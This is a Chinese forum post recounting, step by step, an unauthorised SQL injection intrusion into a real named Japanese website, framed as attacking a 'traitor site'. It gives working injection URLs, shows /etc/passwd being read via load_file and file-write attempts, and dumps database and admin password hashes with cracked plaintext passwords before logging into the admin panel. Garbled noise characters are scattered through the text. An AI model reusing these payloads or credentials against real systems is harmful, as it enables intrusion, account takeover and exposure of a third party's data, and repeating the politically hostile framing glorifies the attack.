原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

6 y" H' L8 H) m2 r. j* R
0x01. 检测 www.zuaa.jp 收集数据


% I6 d! J1 s' ^. t3 Twhatweb


- X1 @; C9 V6 x5 u: e利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
( s" z* r. y# G' _0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
- Y$ L8 D$ k5 F: @, {+ h
4 G& Y8 i" N. t% B6 ^' Korder by 28报错，order by 27正常
3 [9 Y0 E- I# r/ d  L  m; L3 o
0x04.   union手动查询
) I& i6 z0 m: Z1 zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

# q: O/ {! g7 o. x0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
database:    openpne
version:      4.1.22
7 P2 l  I/ x/ {. \$ {6 kos:             portbld-freebsd5.4
$ s) b5 m0 h& d$ J) G. m/ X
0x06. root用户
/ c$ W1 N0 Y& k利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
  y; D. G$ ?7 m4 H; _) M7 `
通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
2 t6 z& S9 f. D' ~" S
( k) H: d; Z% I6 f0 _0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
3 |7 O3 ^* o/ Y* l0 G* Y猜常规表名，字段未果 工具 sqlmap
' C: X8 H' M5 ?$ u' p中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
1 p7 D/ ]0 R4 A/ k/ n, k
  V0 j1 y/ n. i# G) A# S) z5 X

' |  L+ H1 ]8 ?/ I. C; I" q1 k" D. k0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

2 x9 @* P  V& n8 c1 G0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

' j" h0 g. [* R4 ]这个可以在 www.cmd5.com 解密
/ I* _8 Z% w9 |2 Q; Wroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
  w' Z3 m4 _, t" z6 E' @chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
/ ^$ D6 A. L/ f  f6 H6 i4 L8 T: aopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! a  x; s3 M# ~; x工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

8 S+ T# e, A' F  e5 {, v
0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

2 s5 a7 X" z; ~. |. p
0 y0 x$ \! O" b2 H: [" K0x12. 默认信息利用
- H* ~. P1 F# ~: Nhttp://sns.zuaa.jp/?m=admin&a=page_login
" `2 x6 E9 Q3 E7 X4 c8 J
表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
& G7 K" L: M& {1 L3 u, Pzuaajp:c0923ec5857796a393da99905008c176,          zju1897
7 L( H6 v8 V3 m0 \" ~/ J4 i
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0 S* O( J- k+ R9 p- S. G0x13. 登录后台
6 ^  O3 U4 L$ I& {: b  l
" e# x& D# @; E4 ]# Z) u5 x5 E
* Z! \; ]0 N0 p
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
/ Y. \% N( r0 A2 `  ^; W感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
. ~! Q' o; t6 d------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
0 K+ e# R" [3 Y& r8 |- n中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
5 W- [: p5 w, y0 o* r
, T+ M: I! g7 }5 n最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的